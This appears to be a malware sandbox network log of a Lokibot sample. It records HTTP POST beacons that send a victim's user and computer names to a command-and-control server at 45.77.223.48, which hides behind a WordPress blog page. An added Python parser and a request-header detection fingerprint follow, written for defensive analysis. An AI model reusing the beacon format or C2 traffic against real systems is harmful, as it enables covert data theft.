                                              Apr 26, 2024 04:57:20.867063046 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:20.873770952 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.873842001 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.873845100 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:20.874186039 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:20.880363941 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.880424023 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:20.880460024 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.880507946 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:20.894118071 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.894179106 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.894371033 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:21.054208994 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:21.054305077 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:21.056286097 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:21.244081020 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:21.244206905 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:21.432917118 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.132865906 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.132925987 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.132961988 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.133001089 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.137578011 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.140810966 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.140899897 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.141139984 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.141199112 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.141222000 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.141275883 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.141365051 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.141418934 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.141568899 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.141647100 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.141664028 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.141685009 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.141712904 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.141733885 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.293154001 CEST4974780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.320334911 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.320395947 CEST804974645.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.320415974 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.320492029 CEST4974680192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.481096029 CEST804974745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.481204033 CEST4974780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.484752893 CEST4974780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.673346996 CEST804974745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:22.673417091 CEST4974780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:22.859450102 CEST804974745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:23.609919071 CEST804974745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:23.610166073 CEST4974780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:23.610285044 CEST804974745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:23.610388994 CEST4974780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:23.610569000 CEST804974745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:23.610644102 CEST804974745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:23.610702038 CEST804974745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:23.610708952 CEST4974780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:23.610723019 CEST804974745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:23.610755920 CEST4974780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:23.610755920 CEST4974780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:23.610780001 CEST4974780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:23.610948086 CEST804974745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:23.611046076 CEST4974780192.168.2.445.77.223.48
                                              • 45.77.223.48
                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               0 | 192.168.2.4 | 49737 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Apr 26, 2024 04:57:08.113615990 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 176
                                              Connection: close
                                               Apr 26, 2024 04:57:08.300956964 CEST | 176 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: 'ckav.rujones528110JONES-PCk0FDD42EE188E931437F4FBE2CeKal2
                                               Apr 26, 2024 04:57:09.199505091 CEST | 215 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:08 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                               Apr 26, 2024 04:57:09.199570894 CEST | 64 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
                                              Apr 26, 2024 04:57:09.199605942 CEST77INData Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:09.208127975 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:09.208436966 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:09.208544970 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:09.208736897 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:09.208884001 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:09.208923101 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:09.209387064 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 04:57:09.548217058 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 45.77.223.48
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 8425B4CA
Content-Length: 176
Connection: close
Apr 26, 2024 04:57:09.736443043 CEST | 176 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: 'ckav.rujones528110JONES-PC+0FDD42EE188E931437F4FBE2Cjqtot
Apr 26, 2024 04:57:10.612135887 CEST | 215 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 02:57:09 GMT
Server: Apache
Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
Connection: close
Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:57:10.612238884 CEST | 59 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:57:10.612293005 CEST | 82 | IN | Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:57:10.621912956 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:57:10.622256994 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:57:10.622353077 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:57:10.622523069 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:57:10.622662067 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:57:10.622757912 CEST | 1289 | IN | Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:57:10.622801065 CEST | 1289 | IN | Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49741 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 04:57:10.856048107 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 45.77.223.48
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 8425B4CA
Content-Length: 149
Connection: close
Apr 26, 2024 04:57:11.042620897 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:57:11.914695024 CEST | 215 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 02:57:10 GMT
Server: Apache
Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
Connection: close
Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:57:11.914849997 CEST | 59 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:57:11.915000916 CEST | 82 | IN | Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:57:11.923022032 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:57:11.923624039 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:57:11.924005985 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:57:11.924097061 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:57:11.924233913 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:57:11.924304962 CEST | 1289 | IN | Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:57:11.924384117 CEST | 670 | IN | Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
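Every session above carries the same exchange: an HTTP/1.0 POST to /~blog/?ajax=a with the fixed User-Agent Mozilla/4.08 (Charon; Inferno), a non-standard Content-Key header and a small binary body, answered by the C2's cover page (a WordPress front page). The dumped body opens with a 16-bit version (0x12), a 32-bit request id (0x27 on the two 176-byte posts, 0x28 on the 149-byte ones; the Data Ascii lines show these as ' and ( ), a length-prefixed narrow string ckav.ru, and then a run of UTF-16LE strings, each introduced by a 16-bit flag of 1 and a 32-bit byte length (jones, 528110, JONES-PC). The Python below is an added example, not part of the Joe Sandbox report or of any Lokibot tooling: it parses that prefix from the bytes shown in the dump (the report truncates the hex after 82 bytes, so the parser also reports when a declared length runs off the end) and matches the request-header fingerprint. The meanings given to the two request ids and the user/computer/domain order of the three wide strings are assumptions taken from public Lokibot write-ups, not something the report states; the bytes after the last wide string are left undecoded.

```python
"""Parser and header fingerprint for the Lokibot beacons captured above (added example)."""
import struct
from dataclasses import dataclass, field
from typing import Dict, List

# Body bytes copied from the "Data Raw" dump of the 176-byte POST. The report
# truncates the dump, so only the first 82 of 176 bytes are available here.
BEACON_0x27 = bytes.fromhex(
    "12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75"
    " 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00"
    " 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00"
    " 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00"
    " 00 05 00 00 00 04 00 00 01"
)
# In the dumped prefix the 149-byte POSTs differ only in the request id byte.
BEACON_0x28 = BEACON_0x27[:2] + b"\x28" + BEACON_0x27[3:]

# ASSUMPTION: request-id meanings and wide-string order come from public Lokibot
# write-ups; the report itself only shows the raw values.
REQUEST_NAMES: Dict[int, str] = {0x27: "exfiltrate stolen data", 0x28: "poll for C2 command"}
WIDE_FIELD_NAMES = ("user_name", "computer_name", "domain")


@dataclass
class Beacon:
    version: int
    request_id: int
    marker: str                                   # narrow string, "ckav.ru" in every capture
    wide_strings: List[str] = field(default_factory=list)   # UTF-16LE fields that follow it
    trailer: bytes = b""                          # bytes after the last wide string, undecoded
    truncated: bool = False                       # a declared length ran past the dump's end

    def describe(self) -> str:
        kind = REQUEST_NAMES.get(self.request_id, "unknown")
        fields = ", ".join(f"{n}={v!r}" for n, v in zip(WIDE_FIELD_NAMES, self.wide_strings))
        return f"v{self.version} id=0x{self.request_id:02x} ({kind}) marker={self.marker!r} {fields}"


def parse_beacon(data: bytes) -> Beacon:
    """Decode the fixed header, the narrow marker string and the run of flagged
    UTF-16LE strings; stop cleanly at the first non-string flag or at truncation."""
    if len(data) < 10:
        raise ValueError("body shorter than the 10-byte fixed header")
    version, request_id, marker_len = struct.unpack_from("<HII", data, 0)
    pos = 10
    if pos + marker_len > len(data):
        return Beacon(version, request_id, "", truncated=True)
    marker = data[pos:pos + marker_len].decode("ascii", errors="replace")
    pos += marker_len
    beacon = Beacon(version, request_id, marker)
    # Each wide string is: u16 flag == 1, u32 byte length, UTF-16LE payload.
    while pos + 6 <= len(data):
        flag, length = struct.unpack_from("<HI", data, pos)
        if flag != 1:
            break
        end = pos + 6 + length
        if end > len(data):
            beacon.truncated = True
            return beacon
        beacon.wide_strings.append(data[pos + 6:end].decode("utf-16-le", errors="replace"))
        pos = end
    beacon.trailer = data[pos:]
    return beacon


# Request-head fingerprint shared by all sessions above.
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"


def is_lokibot_request(raw_request: str) -> bool:
    """True when an HTTP request head has a POST ... HTTP/1.0 request line, the
    fixed User-Agent, a Content-Key header and an octet-stream body."""
    head = raw_request.split("\r\n\r\n", 1)[0].split("\r\n")
    if not head[0].startswith("POST ") or not head[0].endswith(" HTTP/1.0"):
        return False
    headers = {}
    for line in head[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return (headers.get("user-agent") == LOKIBOT_UA
            and "content-key" in headers
            and headers.get("content-type") == "application/octet-stream")


# Request head of session 1 above, reassembled from the report's lines.
SAMPLE_REQUEST = (
    "POST /~blog/?ajax=a HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: 45.77.223.48\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: 8425B4CA\r\n"
    "Content-Length: 176\r\n"
    "Connection: close\r\n\r\n"
)

if __name__ == "__main__":
    for body in (BEACON_0x27, BEACON_0x28):
        print(parse_beacon(body).describe())
    print("header fingerprint matches:", is_lokibot_request(SAMPLE_REQUEST))
```

The header match is deliberately strict on the User-Agent string and the presence of Content-Key, since those two together are what separates these posts from ordinary HTTP/1.0 clients; the parser stops at the first flag that is not 1 rather than guessing at the undocumented bytes that follow JONES-PC.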


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49742 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 04:57:12.236287117 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
